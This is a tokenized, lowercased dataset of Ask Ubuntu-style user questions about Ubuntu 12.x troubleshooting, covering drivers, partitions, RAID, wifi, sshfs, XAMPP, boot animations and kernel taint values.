248466	keyboard backlit - ubuntu 12.10 - sony vaio	ok , i know there are bunch of back-lit issues already posted and answered but mine is different so please do n't ' ignore me . lol . in windows 7 , my keyboard back-lit is always turned on while on ac mode , which i like because i work at night and on ac power most of the time . on battery mode , keyboard lights up when a key is pressed and turns off a few seconds . now , i completely removed my windows and installed ubuntu 12.10 x64 . and i love it . yes i do . though i have issues with it , i 've managed to fix some issues but ca n't figure out this 2 issues . when in ac mode , the back-lit is not `` always on '' like the way it behaves in windows before . i 'd like to make it always on when i 'm in ac mode . i have two built-in card readers , an sd reader and and produo reader . neither of them works . i have a realtek rts5209 card reader -- - lspci result . i 'm very new to ubuntu ( linux ) . please help me with this issues . thanks in advance .
248470	what does the kernel taint value mean ?	running cat /proc/sys/kernel/tainted prints the current kernel taint value ( in base 10 ) . my understanding is that this value is a bitfield , where each bit indicates the absence or presence of a particular type of taint . you can extract the bits using python3 -c 'from pprint import pprint ; pprint ( list ( zip ( range ( 50 ) , reversed ( bin ( int ( open ( `` /proc/sys/kernel/tainted '' ) .read ( ) ) ) [ 2 : ] ) ) ) ) ' i 've searched for documentation , but what i 've seen only identifies the meaning of bits 0 through 10 . for example , http : //www.kernel.org/doc/documentation/sysctl/kernel.txt says : tainted : non-zero if the kernel has been tainted . numeric values , which can be ored together : 1 - a module with a non-gpl license has been loaded , this includes modules with no license . set by modutils > = 2.4.9 and module-init-tools . 2 - a module was force loaded by insmod -f. set by modutils > = 2.4.9 and module-init-tools . 4 - unsafe smp processors : smp with cpus not designed for smp . 8 - a module was forcibly unloaded from the system by rmmod -f. 16 - a hardware machine check error occurred on the system . 32 - a bad page was discovered on the system . 64 - the user has asked that the system be marked `` tainted '' . this could be because they are running software that directly modifies the hardware , or for other reasons . 128 - the system has died . 256 - the acpi dsdt has been overridden with one supplied by the user instead of using the one provided by the hardware . 512 - a kernel warning has occurred . 1024 - a module from drivers/staging was loaded . 2048 - the system is working around a severe firmware bug . 4096 - an out-of-tree module has been loaded . i also tried viewing the documentation for the ubuntu kernel by installing the linux-doc package and opening zless /usr/share/doc/linux-doc/sysctl/kernel.txt.gz , but that still only lists up to 1024 . in my case , i 'm running the default pae kernel ( 3.2.0-36-generic-pae ) on precise . i am also seeing bit 12 set . where is the complete documentation for what the tainted bits mean on ubuntu kernels ?
248473	trouble connecting to wifi in windows 7 vm	i run ubuntu 12.10 as host and i am trying to use virtualbox for gaming with a windows 7 guest . i can not , however , connect to my wireless internet in the guest . any suggestions ?
248474	was my computer hacked by minecraft/craftbukkit initscript ?	i was playing around in terminal , i 'mis-clicked ' ( havent yet configured trackpad , very jumpy cursor ) while trying to run nano . what happened next kind of threw me for a loop . here is what printed inside my lxterminal.. ( i am ucd ... ) ucd @ ucd-uc : ~ $ sudo nano do.ws > > > for list information , ... bash : syntax error near unexpected token ` > ' ucd @ ucd-uc : ~ $ [ admin ] craftbukkit initscript for centos/fedora/ubuntu | bukkit ... [ admin ] : command not found bukkit : command not found ucd @ ucd-uc : ~ $ forums.bukkit.org › home › forums › bukkit › bukkit tools forums.bukkit.org : command not found ucd @ ucd-uc : ~ $ 30 posts - 6 authors - feb 19 , 2012 30 : command not found ucd @ ucd-uc : ~ $ this is an initscript to run a minecraft or craftbukkit server on ... craftbukkit ( pid 9037 ) is running . ... . error : process id list syntax error . bash : syntax error near unexpected token ` ( ' ucd @ ucd-uc : ~ $ getting the process id in a shell script what could that be ? my cursor is very jumpy , like extremely , and it jumped when this happened . i have no idea what minecraft or bukkit is ? i would appreciate it vastly if you gave me some clues . also i have a user called 'irc ' in my faillog -a output . is that normal ?
248477	trouble with persistence after making a usb live thumb drive using pendrivelinux	i created a bootable ubuntu on my 32gb thumb drive ( on a ntfs partition ) and i selected a persistence of 4gb . i 've noticed that when i reboot from the initial booting off of the usb thumb drive , nothing is preserved . no apps that were installed nor saved bookmarks . is there a way for me to manually force persistence ?
248479	hardware raid1 device is the wrong size/too small ?	my motherboard has an intel raid controller . i set up 2x3tb hdd in raid1 named `` home '' . this should make a single device that is about 3tb . this is what i end up with : # fdisk -l disk /dev/sda : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003431e device boot start end blocks id system /dev/sda1 2048 3905535 1951744 83 linux /dev/sda2 3907582 468860927 232476673 5 extended /dev/sda5 3907584 468860927 232476672 8e linux lvm disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00097a6c device boot start end blocks id system disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00097a6c disk /dev/mapper/isw_djdcaefbcg_home : 651.5 gb , 651543318528 bytes 255 heads , 63 sectors/track , 79212 cylinders , total 1272545544 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00097a6c device boot start end blocks id system as you can see , i end up with a device that is 650gb , not 3tb . i 'm using a fresh and updated install of ubuntu 12.04 .
248480	can i install ubuntu 12.10 in a toshiba satellite c645d ?	i am wondering if my drivers will work . i really need my webcam but i do n't know if it will be okay . can someone help me ? sorry if it 's a silly question .
248490	mod_python returns plaintext script ?	ubuntu 12.10 server in a virtualbox vm . i have installed mod_python using apt-get , enabled it using a2enmod , and rebooted apache2 . i have also edited \etc\apache2\sites-available\defaults as below . my script resides in /var/www/py/ and is called via a jqquery.ajax post function . this script is triggering , but returns itself - in plain text . it should be returning json , indicating that i have missed some obvious setup step . uncommenting the testhandler line , below , results in the script returning mod_python.testhandler output - essential the php.info ( ) output , but for python . < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks indexes multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride all options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > < directory /var/www/py > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all addhandler mod_python .py # pythonhandler mod_python.testhandler pythondebug on < /directory >
248496	google chrome does not close properly	when google chrome opens , it displays a message that says that it `` did not shut down properly '' . this happens everytime i open it , after booting the computer or just after closing the browser with the x . there is a button that offers me to open the recent tabs , but the button does not work and chrome does not find anything , i end up on a blank page . in order to solve my problems , i tried to turn off my extensions and that kind of things , but i found out that it does not work . plus , the changes are not saved in chrome apparently , i suggest that it is because it does not close properly . i would like to solve this problem without removing and re-installing chrome because i have a lot of stuff saved in my bookmarks and the configuration of my address bar* . the problem started out of the blue , not after any update or anything . i want it to be solved because i need to have access to my recently closed tabs when the browser opens . i tried to update with the current stable version of chrome but it did not change anything . *edit : my address bar has search engines configured ( maps , language translation , wikipedia ... )
248500	ubi-partman failed with exit code 10 during 12.10 fresh install	ive been trying to install ubuntu 12.10 on my acer aspire one 534h , using an iso from the official site and a 16gb flash drive using unetbootin . my aa1 is running factory settings ( xp ) . it will boot fine from the usb , but the installation throws the error in the title after choosing my wifi options , and contineus to give the error after every subsequent step . after trying to complete the installation ingoring the error , it hangs on the ask ubuntu screen . ive tried reformatting and reflashing ( sorry , heavy android user ) ubuntu to the flash drive , to no avail ... do i need to format somthing else , or is it something to do with th hdd and raid drives ? ive looked in my bios and found nothing related . only the option for sata or ide ... any help would be great , as ive been working at this all day ... edit : the error message was ubi-partman has failed with exit code 10. see ( gave a directory ) for more info . it then informed me that if i continued the install could be incomplete or completly broken . not sure abouth the wording in the second part , but the error is word for word ... thank you .
248504	desktop files do n't use seem to use $ path correctly	i am creating .desktop files for use in the unity launcher . i have my own location in my home directory where i put my executables ( ~/usr/bin/ ) which is correctly added to my path environment variable in my .pam_environment file as specified in the relevant ubuntu documentation . this is the contents of my .pam_environment file : language=en_au : en_gb : en lang=en_au.utf-8 lc_numeric=en_au.utf-8 lc_time=en_au.utf-8 lc_monetary=en_au.utf-8 lc_paper=en_au.utf-8 lc_name=en_au.utf-8 lc_address=en_au.utf-8 lc_telephone=en_au.utf-8 lc_measurement=en_au.utf-8 lc_identification=en_au.utf-8 path default= $ { path } : ~/usr/bin/ which results in my path variable being as follows : ben @ ben-hpdv6 : ~ $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : ~/usr/bin/ : ~/usr/bin/ i know it is appended twice , but anything in the .pam_environment file seems to get added twice no matter what when using the correct syntax recommended in that ubuntu documentation i have referenced . this is one example of the problem ( it happens with all cases ) . i have a script ( called eclipse ) in ~/usr/bin/ which runs eclipse ide . i can open any terminal and simply type eclipse and it runs fine like you would expect . but when using the following .desktop file : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false name=eclipse - juno ( 4.2 ) icon=/home/ben/.icons/eclipse.svg exec=eclipse i get the error : but when i change the exec= line to : exec=/home/ben/usr/bin/eclipse it works perfectly . the official unity launchers and desktop files documentation suggests that this should work : exec is the path to the executable file . the full path to the executable file must be used only in case it is n't in any of the paths specified in the $ path variable . for example , any files that are inside the path /usr/bin do n't need to have their full path specified in the exec field , but only their filename . any suggestions on what is happening ?
248509	ubuntu 12.10 is not displaying anything after rebooting after installing updates	i have installed ubuntu 12.10 alongside windows 7 home premium using wubi.exe in local disk.recently i installed some apps from software center.then i installed the updates ( around 275mb ) .after that i installed code : :blocks before restarting.then i restarted my laptop.my screen was just blinking.even the login window was not displayed . again i uninstalled it and installed it in a separate drive which i partitioned for ubuntu . i installed the updates immediately on rebooting.on rebooting after installing the updates , the same problem happened again . what should i do now ?
248510	unable to connect d link 3g modem in ubuntu 12.10	when command entered on terminal : usbdeviceswitchdlink i 'm getting error as : file : usbdeviceswitchdlink.c starting ... ... ... ... ... ... ... .vid:8973 pid : 7 vid:32903 pid : 36 vid:7531 pid : 2 vid:8193 pid : 32000 vid:5593 pid : 2639 vid:3315 pid : 12293 vid:3141 pid : 25661 vid:32903 pid : 36 vid : pid : 2 right_dev usb_open error : could not access device . aborting ending ... ... ... ... ... ... ... .
248511	how to install matlab if i already have a windows versions ?	i am new to ubuntu and confused to use whether matlab windows version ( which i had a copy ) using wine or to install linux version . if it is good to install linux version of matlab i would like to know the detail set of instructions to install it .
248519	internet does not work well on ubuntu but does so on windows	i have a dual boot system with windows7 and ubuntu 12.04 with wired internet connection . it is configured to automatic dhcp . the internet works perfectly well on windows . but on ubuntu , the connection sometimes work , sometimes not . on most occasions , internet does n't work . the indicator does say 'connection established '' . i have tried other distros earlier with the same issue . i do n't understand why it works well in windows and not on ubuntu . please help .
248520	how do you get libreoffice calc to make sorted tables ?	now by sorted tables i should clarify . i 'd like libreoffice calc to create tables with the same functionalities as those formed in microsoft excel 2007/2010 when the table data is selected and ctrl+t is pressed . when i sort a column i want all the columns to change accordingly so that each row is lined up properly . i am running libreoffice 3.6.4 on 12.10 if these details are necessary .
248526	dell m5010 wireless not working after upgrade	i dual installed ubuntu on my dell m5010 windows 7 laptop . everything was fine until i installed the update . at that point my wireless would not connect . can you please help me ?
248528	failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb 403 forbidden	i am using ubuntu 12.04 32-bit with kernel 3.2.0-26-generic and gnome 3.4.1. when i run the upgrade manager , i get the option for partial upgrade and details show : install ( 11 ) remove ( 1 ) upgrade ( 744 ) then , i start the upgrade and get : could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . where out of 755 files . it does not download 5 : failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/libk5crypto3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb 403 forbidden failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/libgssapi-krb5-2_1.10+dfsg~beta1-2ubuntu0.3_i386.deb 403 forbidden failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb 403 forbidden failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5support0_1.10+dfsg~beta1-2ubuntu0.3_i386.deb 403 forbidden failed to http : //np.archive.ubuntu.com/ubuntu/pool/main/k/krb5/krb5-locales_1.10+dfsg~beta1-2ubuntu0.3_all.deb 403 forbidden this continues for weeks , i have tried it 15 times already .
248536	need more information about api for 'ubuntu for phones '	i would like to develop a app on ubuntu for phones . i have already developed apps on iphone and android . could you please suggest me how i can download and setup the mobile development environment for ubuntu for phones , and also i would like to know the api documentation .
248537	losing sound after installing wine 1.5 ( +python 2.7 ) ?	i have a desktop and a laptop computer . since i wanted to run irfanview ( that works great now ! ) , i installed wine 1.5.22 , which involved installing 1 gb of dependencies . the desktop continues to work fine , on the laptop , i have lost all sound . i saw some message in banshee saying that it wants some python libraries for sound or something like that and that it cannon find them . can you offer me any suggestions ? thanks in advance ! i have linux mint 14 32-bit
248540	ircd-hybrid operator does n't work	i 've installed ircd-hybrid in my network , now i 'm operator and i receive operator privs , something like this : *** oper privs are < some code here > but i can not manage anything in my server , i want to assign channel operator to a user , i ca n't . i want to de-assign channel operator privs , i ca n't , and so on . i was not able to find a guide on google related to commands of irc . when i type /operserv something i receive /operserv is not recognized by server . when i /msg operserv it says unknown nick or channel please help . thanks in advance .
248542	is it important to leave mysql running in the background ? is there a gui to control processes on ubuntu 12.04 ?	im using bootup manager ( bum ) to control auto-start processes on ubuntu 12.04 . i have stopped apache2 from starting automatically using bum . the problem is , today i have found that sql server is always running in the back . i can not alter auto-start settings for mysql from bum . why i can not see any entry for mysql in bum , moreover does sql needed by the ubuntu os itself for its own processes ? if not needed by the os itself , then is it safe to disable mysql and restart it whenever i need it ? how should i do that ? is there any gui application for doing so ? upto now im using this command for start/stop apache2 and mysql sudo /etc/init.d/apache2 start/stop/restart sudo /etc/init.d/mysql start/stop/restart or sudo start/stop mysql service mysql status is it possible to create a .py file which add gui functionality to this .
248543	switching between graphics cards and on board graphics in ubuntu	hi i am running ubuntu 12.04 on dell inspiron 14z laptop which has got ati graphics cards and also intel on board graphics card . by default it uses ati , which consumes more power and heats up a lot . is that possible between ati and on board depending upon our requirement , so that i can save my battery and avoid laptop on heating up ?
248549	complete failure of any nvidia drivers to work on sager np9150 / clevo p150em with gtx 670mx on 12.10	i have tried every possible solution in my knowledge to install nvidia drivers that are functional on ubuntu 12.10 . i define functional as the following : 1 ) working user interface 2 ) ability hibernate / suspend . currently i can only get the first of the two to work with the free drivers that are installed with the system . i had to switch the bios to uefi to even be able to install 12.10 everything then seemed to be working fine until i tried to hibernate which resulted in a blackscreen of death on the awakening . i this link and a few others that basically all conveyed the same information : that i needed to intall some type of proprietary nvidia driver from a specified ppa . however every single attempt gave me the following message : the following new packages will be installed : nvidia-current-updates 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/67.7 mb of archives . after this operation , 204 mb of additional disk space will be used . selecting previously unselected package nvidia-current-updates . ( reading database ... 195988 files and directories currently installed . ) unpacking nvidia-current-updates ( from ... /nvidia-current-updates_304.51- 0ubuntu1_amd64.deb ) ... processing triggers for man-db ... setting up nvidia-current-updates ( 304.51-0ubuntu1 ) ... update-alternatives : using /usr/lib/nvidia-current-updates/ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-alternatives : using /usr/lib/nvidia-current-updates/alt_ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) info : enable nvidia-current-updates debug : parsing /usr/share/ubuntu-drivers-common/quirks/lenovo_thinkpad debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirks_here debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : processing quirk thinkpad t420s debug : failure to match clevo with lenovo debug : quirk does n't match debug : processing quirk latitude e6530 debug : failure to match clevo with dell inc. debug : quirk does n't match loading new nvidia-current-updates-304.51 dkms files ... first installation : checking all kernels ... building only for 3.5.0-24-generic building for architecture x86_64 building initial module for 3.5.0-24-generic done . nvidia_current_updates : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-24-generic/updates/dkms/ depmod ... . dkms : install completed . processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-24-generic when i reboot , i am able to get to my desktop but the interface fails to show up and i am left with a wallpaper . my specs are the following ( from invoice ) 1x sager np9150 / clevo p150em display : 15.6 '' fhd 16:9 `` matte type '' super clear ultra bright led anti-glare sager screen w/ 95 % ntsc color gamut ( 1920x1080 ) ( sku - s1x301 ) processor : sager - 3rd generation intel® ivy bridge core™ i7-3840qm ( 2.8ghz - 3.8ghz , 8mb intel® smart cache , 45w max tdp ) ( sku - s2r203 ) thermal compound : -stock oem thermal compound graphics video card : nvidia geforce gtx 670mx 3,072mb pci-express gddr5 dx11 with optimus™ technology [ user upgradeable ] ( sku – s3r517 ) copper cooling upgrade : no copper cooling upgrade external display video adapters : no video adapter external mobile display : no external mobile display ram : 32gb - ddr3 1600mhz dual channel memory ( 4 sodimms ) ( windows 7 pro os required ) ( sku - s4t844p ) msata ssd drive ( slot 1 ) : no msata ssd primary hard drive : 512gb crucial m4 series solid state drive [ ssd2 serial-ata iii ] ( sku – s5r063 ) optical drive bay : combo dual layer supermulti dvdrw/cdrw drive w/ software ( when selecting a hard drive in the optical bay , no optical drive is included ) ( sku - s7r455 ) optical drive bay hard drive caddy : sager - optical bay hard drive caddy ( caddy only ) used for installing your own hard drive ( optical drive bay remains as selected ) memory card reader : internal 9-in-1 card reader ( mmc/rsmmc/sd/mini sd/sdhc/sdxc/ms/ms pro/ms duo ) bluetooth : bluetooth included with select wireless cards only ( see “wireless network” section below ) wireless network : sager - intel® advanced-n 6235 - 802.11a/b/g/n wireless lan module + bluetooth™ 4.0 ( sku - s8r111 ) wireless network accessories : no network accessory camera : built in 2.0 megapixel camera sound card : sound blaster compatible 3d audio - included battery : smart li-ion battery ( 8-cell ) fingerprint reader : integrated fingerprint reader keyboard ( internal - laptop ) : standard sager/clevo non chiclet backlit keyboard operating system : no operating system standard - drivers & utility software only i bought this computer because it had similar spec to the bonobo extreme from system 76 but in a 15 inch form that i can actually fit into my backpack . if you take a look at their offering you will notice , for example , that the processor and graphics card on my computer are options for the extreme . obviously the bonobo extreme must work out of the box with ubuntu or system 76 would be probably be dead by now so i assumed that since i have a very similar computer , that mine would work out of the box as well -- which , i will admit was probably horrible logic . i am going to have several virtual machines running on this computer ( hence the 32 gb of ram ) including several sql servers and one windows 8 vm in order to be able to use microsoft office ( as libre office is simply unusable for many basic tasks that i perform ) . i travel often and will need to place this computer in my backpack fairly often which necessitates having hibernate/suspend functionality work . i am not very familiar with system graphics and am at a complete loss as to how to proceed . i am assuming cannonical will probably fix this in the near future as the failure of graphics cards to function properly pretty much negates the use of ubuntu desktop for most users that have a graphics card . however , i am about to embark upon a major project so i need all the help i can get right now . i realize my system is pretty obscure , but then again ubuntu desktop is pretty obscure in the grand scheme of things and i feel like many other linux users probably have purchased similar computers as they allow for customization and do n't make you pay for a windows version that you will immediately uninstall . so , please let me know if you have a similar system and got this working and what exact steps you took , thanks , thx1138
248551	creating ubuntu partition image	i 've finally finally set up ubuntu so that it works well with my laptop 's hybrid graphics system . and i do not want to go through this process all over again , it 's terrible . is there a way i can just backup ubuntu ( with all the custom drivers and settings , files too maybe ) , and restore it later if something goes wrong ? i 'm dual booting ubuntu 12.04 and windows 8 .
248554	message tray does not give live updates forthunderbird , gwibber , emphathy . is this supposed to be like this ?	i am running a fresh install of ubuntu 12.10 . i entered my account details in the online accounts app . in the message tray icon in the systray , thunderbird , gwibber , empathy all just have links to the app . unless the thunderbird , gwibber , emphathy itself in running , the message tray doesnt give live updates if i receive a email or message . is this supposed to be like this ?
248555	iced tea-2.3.4 installation script fails on executing	i downloaded icedtea-2.3.4 tar ball and extracted it on my ubuntu 12.04 lts desktop system . while running install-sh ( permission allowed to be executable ) and clicking on run in terminal gives nothing but just a frame of terminal window for fraction of second . i am unable to install latest icedtea-2.3.4 , which i compulsorily require because one of banking site needs it . how to install icedtea-2.3.4 ?
248559	ubuntu 12.10 can not access all my ram , but a reboot solves the problem	i have 2 chips of 4gb ram on my pc and i ubuntu 12.10 64 bit running . it is all up to date with the released kernel verisons . when i boot my pc ... it detects on 1 ram chip and shows only 4 gb of ram , but a reboot solves the problem . please help me solve the problem , as i have to reboot my system everytime i switch it on , before i can work . thanks . output of uname -a linux panplexiasuper 3.5.0-22-generic # 34-ubuntu smp tue jan 8 21:47:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux
248561	can not connect ubuntu with samsung galaxy note 10.1 over wifi	can not connect or see samsung galaxy note 10.1 from my ubuntu machine on wifi . error message when i scan wifi from galaxy note : no windows shares found on network when connecting galaxy note with ubuntu via usb the sd-card can neither be accessed nor information read ! i have no problem with windows 7 to connect or save anything in both directions ! is there a simple solution like an app that will allow to access ubuntu from galaxy note or do i have to install additional software on my ubuntu machine because i read somewhere that ubuntu can not read file system of android devices ? thanks for your help and suggestions !
248563	specifying a custom mount point for an empty partition	i have ubuntu 12.04 running on my system . i repartitioned my hard disk yesterday , i have an empty 40gib partiton . can i mount it at say /data-part ? how do i do this ? i have formatted it as ext4 .
248564	ubuntu 12.10 purple screen with amd x1300 mobility graphics card ( can boot with nomodeset or radeon.modeset=0 )	a new ubuntu user here and i 've just installed it on an older laptop of mine with the above graphics card ; and ati x1300 mobility . i have a dual boot setup with windows xp . my issue is that i can not boot normally without pressing e in the grub menu and adding either nomodeset or radeon.modeset=0 in place of quiet and splash . when i do load after this , the display is quite laggy . i 've looked around but i am at a loss with what i do ; i 've gathered that there are ati drivers fglrx drivers xorg drivers and apparently the only ones that work for my series of card is the xorg drivers . so i did : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get upgrade as per this thread : http : //ubuntuforums.org/showthread.php ? t=1723067 but when i restarted it didnât help and i still got the purple screen . im not sure i installed correctly i 've also tried installing fglrx and then subsequently purging it because it didint work . as an addendum to that , fglrx got me past the blank purple screen but i it stalled with : '' the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected '' and froze on that screen . '' any help would be greatly appreciated . regards
248573	kde - how to change boot animation	i have also tried following these commands : update-alternatives -- display default.plymouth sudo update-alternatives -- config default.plymouth sudo update-initramfs -u and these : sudo rm /etc/alternatives/default.plymouth sudo ln -s /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth /etc/alternatives/default.plymouth i have also found a wonderful boot animation ( earth-sunrise link http : //www.istitutomajorana.it/scarica2/animazione-plus8.tar.gz ) with a script inside with these commands : sudo cp -r ~/animazione-plus8/earth-sunrise/ /lib/plymouth/themes/ sudo update-alternatives -- install /lib/plymouth/themes/default.plymouth default.plymouth /lib/plymouth/themes/earth-sunrise/earth-sunrise.plymouth 100 sudo update-alternatives -- config default.plymouth sudo update-initramfs -u after all the default kubuntu logo did n't change , so i removed all alternatives with this : sudo update-alternatives -- remove-all default.plymouth sudo update-initramfs -u but i still have the same logo . i think it 's a kde situation . so how can i change that boot animation with that one i got ( earth-sunrise.plymouth ) ? edit : it does n't work for real during ubuntu boot , only virtual boot animation works : / i have followed all the steps but nothing has changed in boot animation . i do n't know maybe my problem is with ati driver i have or with grub settings . what is the right configuration of grub i should have ? i have also grub customizer installed in my distro maybe i have to change something . this is my /etc/default/grub if it helps : http : //paste.ubuntu.com/1587147/ right now i do n't have now boot animation , there only a black screen with some text . edit2 : ok i found my problem , it 's about my gpu ( msi 6870 hawk ) and the proprietary ati drivers : i unistalled old 12.8 ( even with those the plymouth animation was not working ) because i wanted to update my drivers and while i was with open drivers i finally saw the animation on boot , the problem is that i need ati driver and i had to install new 13.1 and infact now plymoth animation does n't work any more . so is there a way to solve the problem , now that i found what it is about ? thanks
248574	is there a way to create graphs for io on server	is there a tool which allows to save a simple data to a file regarding the io usage , so that i could use them to display a graph of io usage ? i need to use it on my server , with no graphical environment so any x application is of no use here . i just need to collect something like time : ( disk read/write ) so that i could make a graph from that .
248582	sshfs no write access	i am trying to use sshfs to mount an remote directory so that i can change the files like local . my problem is that i only can read the files . what i 've done : added my local user michael to the fuse group added my local user root to the fuse group mounted the directory : sshfs -o idmap=user michael.t @ server : /var/www/ www i can read the files but not write . i cant logon with root directly , so i have always to logon with my user and then make sudo su . maybe thats the problem ?
248584	local file copy using smb shares	i created two smb shares for my local disks on my server : disk1 and disk2 . using my laptop i can access the shares . if i try to copy files between these two shares using my laptop the speed is very bad due to my wifi speed . is there a way to do the `` copy job '' as a local job on the server instead of sending the data through my slow wifi connection ? i would like to organize my data on my server but that 's impossible with this slow connection .
248586	very slow copying ubuntu 12.10 , ahci	i have two disks , ssd ( samsung 830 128gb ) and normal hdd ( wd 1tb ) and ubuntu 12.10 installed . ahci enabled in the bios . i have a problem with extremely slow copying in all directions ( samsung- > samsung , wd- > wd , wd- > samsung and samsung- > wd ) . let me describe what i did : sudo hdparm -tt /dev/sda the result more or less ok : timing cached reads : 16678 mb in 2.00 seconds = 8358.48 mb/sec timing buffered disk reads : 1362 mb in 3.00 seconds = 453.96 mb/sec when copying by cp or in the midnight commander i was getting transfers only around 1mb/s ! started reading a bit and after disabling the write cache with hdparm -w 0 /dev/sda the speed reaches the crazy speed of 60mb/s , wchich still is nothing for operation inside the ssd drive . both drives are connected to sata 3 sockets in the motherboard . fyi : copying from usb pendrive goes much faster , so it looks like read speed problem . the problem does n't occur with windows . i paste the dmesg below : [ 4898.720381 ] ata1.00 : configured for udma/133 [ 4898.720387 ] ata1 : eh complete [ 4898.720509 ] sd 0:0:0:0 : [ sda ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 4983.122199 ] ata2.00 : configured for udma/133 [ 4983.122205 ] ata2 : eh complete [ 4983.122315 ] sd 1:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua do you have any ideas what may be wrong ?
248592	how are partitons handled in ubuntu , compared to windows ?	how are partitions in my hard disk handled in ubuntu ? i want to draw parallels with what windows does . let 's say i have a hdd formatted as ext4 , if i create 2 partitions and mount them at /data-part and /movies , have i created 2 partitions like d : / and e : / ?
248594	i can not access phpmyadmin after installing lampp ( xampp for linux 1.8.1 ) on ubuntu 12.04	im seeing this error while trying to open phpmyadmin ( http : //127.0.0.1/phpmyadmin ) : `new xampp security concept : access to the requested object is only available from the local network . this setting can be configured in the file `` httpd-xampp.conf '' . if you think this is a server error , please contact the webmaster . error 403 xser.com apache/2.4.3 ( unix ) openssl/1.0.1c php/5.4.7` edit : i have commented out this code in `` httpd-xampp.conf '' . , but it has introduced a new problem . # new xampp security concept # < locationmatch `` ^/ ( ? i : ( ? : xampp|security|licenses|phpmyadmin|webalizer| # server-status|server-info ) ) '' > order deny , allow deny from all allow from : :1 127.0.0.0/8 \ fc00 : :/7 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 \ fe80 : :/10 169.254.0.0/16 errordocument 403 /error/xampp_forbidden.html.var < /locationmatch > now im seeing this -- access forbidden ! you do n't have permission to access the requested directory . there is either no index document or the directory is read-protected . if you think this is a server error , please contact the webmaster . error 403 xser.com apache/2.4.3 ( unix ) openssl/1.0.1c php/5.4.7
248595	are the reasons for a keyboard layout change logged ?	in trying to solve this problem ( summary : my keyboard layout keeps switching back to the default without any notable reason ) i would very much like to see why a layout switch occurred . is there any way of finding that out after the fact ? maybe a dbus session of the-like that i can monitor and log events from ?
248596	application to use an universal camera keyboard	i 'm trying to use an universal camera keyboard for our application . i followed installation guide and ubuntu is now able to see the device . all i need is a sample software to test the device . to see what kind of keyboard i 'm using , you can check out its online guide .
248597	ubuntu 12.10 wireless network disconnects with samsung np350e7c-s05nl	i have just installed ubuntu 12.1o on my new samsung np350e7c-s05nl laptop . the problem is that it wireless internet keeps disconnecting , after a few minutes working , and i have to continuously restart the internet connection . when i do lscpi -nn i get : 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) do you know how to solve this ?
248606	black screen after wubi install of 12.10 on windows 7	i have tried to install ubuntu 12.10 using wubi on windows 7 . the installation seemed to go ok but when i rebooted there was nothing but a blank screen . i rebooted again and this time ( and every time after ) the windows boot manager allows me to select ubuntu . it comes up with ntfs5 : no wubildr and then there is the same blank screen . i can not do anything except reboot into windows . there is no grub . my machine is an hp mini 200 netbook . the cpu is intel atom n2600 @ 1.60ghz and the graphics is intel graphics media accelerator 3600 series . i have tried increasing the screen brightness with the f3 key but this changed nothing . i have also tried adding nomodeset to the cfg file but this did n't work either . i have successfully installed ubuntu on this machine before via wubi , with the same problem , but i do n't remember what the fix i used was , or the problem being this hard to solve . does anyone know a fix ? thanks
